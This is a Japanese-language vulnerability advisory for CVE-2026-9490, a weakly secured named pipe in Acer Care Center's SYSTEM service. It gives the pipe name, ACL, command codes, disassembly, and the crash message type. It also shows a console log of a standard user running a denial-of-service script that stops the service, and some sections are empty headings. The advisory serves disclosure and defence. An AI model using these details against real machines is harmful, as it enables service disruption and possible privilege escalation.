CVE ID: CVE-2026-9490
研究者: Vo Duc Thang (ugvxb)
謝辞: https://community.acer.com/en/kb/articles/19668
1. 概要
Acer Care Center サービス (ACCSvc.exe) に重大なセキュリティ脆弱性が特定されました。この脆弱性により、認証された任意のローカルユーザーがシステムサービスをクラッシュさせ (サービス拒否)、さらに弱いセキュリティ設定の名前付きパイプインターフェースを通じて特権を昇格させる可能性があります。
SYSTEM 権限 (LocalSystem) で実行されるこのサービスは、すべての認証済みユーザーに読み取り、書き込み、実行のアクセス許可を付与する、過度に緩いアクセス制御を持つ名前付きパイプを公開しています。
2. 脆弱性の詳細
2.1 影響を受けるコンポーネント
| 属性 | 値 |
|---|
| 製品 | Acer Care Center |
| コンポーネント | ACCSvc.exe (ACC サービス) |
| サービス名 | ACCSvc |
| インストールパス | C:\Program Files (x86)\Acer\Care Center\ |
| サービスアカウント | LocalSystem (NT AUTHORITY\SYSTEM) |
| 開始の種類 | AUTO_START |
| 名前付きパイプ | \.\pipe\treadstone_service_LightMode |
2.2 脆弱性 #1: サービス拒否
説明
ACCSvc サービスは、認証された任意のユーザーが接続してメッセージを送信できるようにする、弱いセキュリティ記述子を持つ名前付きパイプを作成します。特別に細工されたメッセージ (メッセージタイプ 0x03) がパイプに送信されると、サービスは終了コード 1067 (ERROR_PROCESS_ABORTED) でクラッシュします。
セキュリティ記述子 (SDDL)
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GRGWGX;;;AU)(A;OICI;GA;;;BA)
SDDL 分析
影響
特別な権限を持たない標準ユーザーが ACCSvc システムサービスを終了させ、Acer Care Center の機能を利用不能にすることができます。
2.3 脆弱性 #2: ローカル権限昇格の可能性
説明
同じ弱い名前付きパイプ ACL により、認証済みユーザーは CreateProcessAsUserW を介してサービスがランチャーアプリケーションを実行するきっかけとなるコマンドメッセージを送信できます。
コマンドコード
| コマンド | 16進値 | ターゲット実行ファイル |
|---|
| 0x19065 | 102501 | ACCAPPLauncher.exe |
| 0x19066 | 102502 | ACCSWALauncher.exe |
| 0x19067 | 102503 | ACCFixpackFolderCleaner.exe |
3. 技術的分析
3.1 バイナリ分析
| 属性 | 値 |
|---|
| ファイル | ACCSvc.exe |
| タイプ | PE32+ executable (console) x86-64 |
| 解析ツール | Radare2 |
| エントリポイント |
3.2 特定された主要関数
3.3 名前付きパイプ作成パラメータ
Pipe Name: \\.\pipe\treadstone_service_LightMode
dwOpenMode: 0x03 (PIPE_ACCESS_DUPLEX)
dwPipeMode: 0x06 (PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE)
nMaxInstances: 255
nOutBufferSize: 512
nInBufferSize: 512
nDefaultTimeOut: 1000ms
3.4 コマンドディスパッチロジック
0x140008b1a mov ebx, dword [rdx + rcx] ; Read command
0x140008b1d lea eax, [rbx - 0x19065] ; Subtract base
0x140008b23 cmp eax, 2 ; Check range
0x140008b26 ja 0x140008bde ; Jump if invalid
4. エクスプロイト結果
accesschk.exe -v \pipe\treadstone_service_LightMode
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\treadstone_service_LightMode
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\Authenticated Users
FILE_ADD_FILE
FILE_CREATE_PIPE_INSTANCE
FILE_APPEND_DATA
FILE_EXECUTE
FILE_LIST_DIRECTORY
FILE_READ_ATTRIBUTES
FILE_READ_DATA
FILE_READ_EA
FILE_TRAVERSE
FILE_WRITE_ATTRIBUTES
FILE_WRITE_DATA
FILE_WRITE_EA
SYNCHRONIZE
READ_CONTROL
RW BUILTIN\Administrators
FILE_ALL_ACCESS
C:\Users\thang\Downloads\Acer>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\Users\thang\Downloads\Acer>sc qc ACCSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ACC Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\thang\Downloads\Acer>sc query ACCSvc
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\Users\thang\Downloads\Acer>python exploit_dos.py
[*] ACCSvc DoS Attack
[*] Target: \\.\pipe\treadstone_service_LightMode
[+] DoS payload sent - service should crash
C:\Users\thang\Downloads\Acer>sc query ACCSvc
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 1067 (0x42b)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
結果: 標準ユーザーが SYSTEM サービスのクラッシュに成功しました。
5. リスク評価
5.1 CVSS v4.0 スコア
| メトリクス | 値 |
|---|
| CVSS 4.0 ベクター | AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/RE:M |
| CVSS ベーススコア | 6.8 (中) |
5.2 CWE 分類
6. 免責事項
この PoC は、教育的および許可されたセキュリティ研究のみを目的としています。著者は、いかなる誤用に対しても責任を負いません。許可なく行うエクスプロイトは違法です。